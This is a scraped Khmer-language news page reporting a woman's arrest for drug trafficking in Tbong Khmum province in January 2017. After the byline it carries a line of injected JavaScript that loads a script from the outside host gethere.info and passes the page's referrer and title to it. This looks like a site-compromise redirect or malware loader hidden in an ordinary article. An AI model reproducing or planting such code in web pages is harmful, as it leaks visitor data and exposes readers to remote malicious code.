Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

ឃាត់ខ្លួនស្ត្រីម្នាក់ពាក់ព័ន្ធការជួញដូរថ្នាំញៀន

ត្បូងឃ្មុំ៖ ជនសង្ស័យម្នាក់និងថ្នាំញៀនមួយចំនួន ត្រូវបានកម្លាំងប៉ុស្តិ៍នគរបាលរដ្ឋបាលឃុំមង់រៀវ ចុះបង្ក្រាបឃាត់ខ្លួនកាលពីវេលាម៉ោង៩និង១០នាទីព្រឹក ថ្ងៃទី២១ ខែមករា ឆ្នាំ២០១៧ នៅក្នុងភូុមិមង់ទី៧ ឃុំមង់រៀវ ស្រុកត្បូងឃ្មុំ ។

សមត្ថកិច្ចបានអោយដឹងថាជនសង្ស័យដែលកម្លាំងបានឃាត់នោះមានឈ្មោះឌាង នី ភេទស្រី អាយុ៣៤ឆ្នាំ ស្នាក់នៅភូមិជើងវត្ត សង្កាត់វិហារលួង ក្រុងសួង និងបានដកហូតថ្នាំញៀន១០កញ្ចប់តូច និងសំភារះវេចខ្ចប់មួយចំនួន។

បច្ចប្បន្នជនសង្ស័យ ត្រូវបានសមត្ថកិច្ចជំនាញនគរបាលស្រុកត្បូងឃ្មុំ កំពុងសាកសួរបន្តតាមនីតិវិធី កសាងសំណុំរឿងបញ្ជូន ទៅអយ្យការ អមសាលាដំបូងខេត្តត្បូងឃ្មុំ ចាត់ការទៅតាមច្បាប់។ដោយ៖ ឡុង សារិន

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More